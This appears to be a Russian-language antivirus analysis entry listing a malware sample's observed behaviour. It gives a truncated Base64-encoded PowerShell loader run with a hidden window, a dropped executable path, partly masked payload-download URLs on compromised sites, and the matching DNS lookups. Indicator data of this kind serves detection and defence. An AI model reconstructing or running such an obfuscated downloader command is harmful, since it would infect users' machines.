Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABXADcAYgBqAGcAcgBrAD0AKAAoACcASgBpACcAKwAnAHQAdAAnACkAKwAnAHQAJwArACcAbQAzACcAKQA7AC4AKAAnAG4AJwArACcAZQB3AC0AaQAnACsAJwB0AGUAbQAnACkAIAAkAGUAbgBWADoAdQBTAGUAcgBwAFIATwBmAGkAbABFAFwAZgBRAF...
- %HOMEPATH%\fqreyfu\gwuqtf5\ztfsqwa9p.exe
- %HOMEPATH%\fqreyfu\gwuqtf5\ztfsqwa9p.exe
- http://as###music.com/axhhy/2/
- http://we###lavera.com/site/1nBdLgY/
- http://va###ana.com/archive/sEaku/
- http://rj##ft.nl/helpdesk/8TQ54h/
- http://zo######hootphotography.com/wp-includes/MPkwrU2/
- http://pr###l.com.br/pedidos/Sp9/
- http://ie###s.co.za/fsffa.co.za/2ntFq/
- DNS ASK as###music.com
- DNS ASK we###lavera.com
- DNS ASK va###ana.com
- DNS ASK rj##ft.nl
- DNS ASK zo######hootphotography.com
- DNS ASK pr###l.com.br
- DNS ASK ie###s.co.za
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABXADcAYgBqAGcAcgBrAD0AKAAoACcASgBpACcAKwAnAHQAdAAnACkAKwAnAHQAJwArACcAbQAzACcAKQA7AC4AKAAnAG4AJwArACcAZQB3AC0AaQAnACsAJwB0AGUAbQAnACkAIAAkAGUAbgBWADoAdQBTAGUAcgBwAFIATwBmAGkAbABFAFwAZgBRAF...' (со скрытым окном)